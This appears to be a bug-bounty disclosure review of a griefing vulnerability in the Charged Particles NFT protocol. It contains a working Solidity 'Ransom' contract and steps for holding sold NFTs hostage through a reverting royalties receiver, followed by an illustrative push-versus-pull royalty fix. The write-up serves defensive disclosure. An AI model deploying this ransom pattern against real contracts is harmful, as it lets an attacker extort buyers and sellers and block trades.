Charged Particles Griefing Bugfix Review

Summary
Whitehat Alejandro Muñoz-McDonald submitted a vulnerability classified as “High” in Charged Particles on February 9. The vulnerability was a griefing/denial of service attack against the protocol that would have allowed a malicious user to create a system where bribes had to be paid for a user to buy or sell an NFT. Charged Particles paid Alejandro Muñoz-McDonald a $5,000 USDC bounty.
Vulnerability Analysis
Charged Particles is a decentralized NFT marketplace where users can deposit ERC-20 tokens into any NFT. Under the Charged Particles protocol, a “Proton” refers to the ERC721 contract for a particle, which is an NFT ready to be energized by adding interest-bearing assets to it. Prior to the fix of this vulnerability, a malicious proton creator could have held Protons hostage after selling them by creating a malicious ransom contract and setting it to be the royalties receiver. The bug was found in Proton.sol.
This vulnerability can be illustrated in a step-by-step analysis.

1. Call createProtonForSale with valid parameters and a royaltiesPercent > 0. Move to the next step when the token is sold.

2. Create a malicious ransom contract:

    pragma solidity 0.6.12;

    contract Ransom {
        bool internal ransomEnabled = true;

        constructor() public {}

        // Paying at least 1 ether disables the ransom
        function unlockNFT() public payable {
            if (msg.value >= 1 ether) {
                ransomEnabled = false;
            }
        }

        // Every incoming ETH transfer (such as a royalty payment) reverts while the ransom is enabled
        fallback() external payable {
            require(!ransomEnabled);
        }
    }

3. Call setCreatorRoyaltiesReceiver(…) with the energizedParticleId and the address of the malicious contract.

4. With setCreatorRoyaltiesReceiver called, the Proton is locked and cannot be sold, because the default payable function of the ransom contract reverts as long as the ransom has not been paid.
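The push-payment royalty pattern behind this class of griefing bug, beside a pull-payment (escrow and withdraw) alternative, as an added example written for this review: it is not Charged Particles' code and is not necessarily the fix the team shipped, and the contract and function names (RoyaltySale, sellPush, sellPull, withdrawRoyalties) are hypothetical.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity 0.6.12;

// Illustrative sale path forwarding creator royalties (hypothetical names, not
// the Charged Particles contracts). Shows why pushing ETH to an arbitrary
// royalty receiver inside the sale lets that receiver block every sale.
contract RoyaltySale {
    address payable public royaltyReceiver;
    uint256 public royaltyBps;                 // royalty in basis points, 500 = 5%
    mapping(address => uint256) public owed;   // escrowed royalties (pull path)

    constructor(address payable receiver, uint256 bps) public {
        require(bps <= 10000, "royalty above 100%");
        royaltyReceiver = receiver;
        royaltyBps = bps;
    }

    // Vulnerable pattern: the royalty is pushed to the receiver during the sale.
    // If the receiver is a contract whose fallback reverts (like the ransom
    // contract above), the revert propagates and the sale can never complete.
    function sellPush(address payable seller) external payable {
        uint256 royalty = (msg.value * royaltyBps) / 10000;
        (bool ok, ) = royaltyReceiver.call{value: royalty}("");
        require(ok, "royalty transfer failed");   // reverting receiver blocks sale
        seller.transfer(msg.value - royalty);
    }

    // Hardened pattern: credit the royalty to escrow and let the receiver pull it.
    // The sale never calls into the receiver, so no receiver can hold it hostage.
    function sellPull(address payable seller) external payable {
        uint256 royalty = (msg.value * royaltyBps) / 10000;
        owed[royaltyReceiver] += royalty;
        seller.transfer(msg.value - royalty);
    }

    // Receiver withdraws its balance; a revert here only affects the receiver.
    function withdrawRoyalties() external {
        uint256 amount = owed[msg.sender];
        require(amount > 0, "nothing owed");
        owed[msg.sender] = 0;                     // clear before sending (reentrancy)
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "withdraw failed");
    }
}
```

Deploying this with the Ransom contract as receiver makes the difference visible: sellPush reverts on every call while the ransom is enabled, whereas sellPull succeeds and the receiver's balance simply accumulates in owed until it chooses to withdraw.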
Vulnerability Fix
Charged Particles quickly implemented a fix of the bug, which is available here:
Acknowledgements
We’d like to thank Charged Particles for quickly acknowledging the bug and implementing a fix. Charged Particles has paid out a bounty of $5,000 to whitehat Alejandro Muñoz-McDonald. To report additional vulnerabilities, please see Charged Particles’ bug bounty program with Immunefi.
If you’d like to start bug hunting, we got you. Check out the Web3 Security Library, and start earning rewards on Immunefi — the leading bug bounty platform for web3 with the world’s biggest payouts.
If you’re interested in protecting your project with a bug bounty like Charged Particles, visit the Immunefi services page and fill out the form.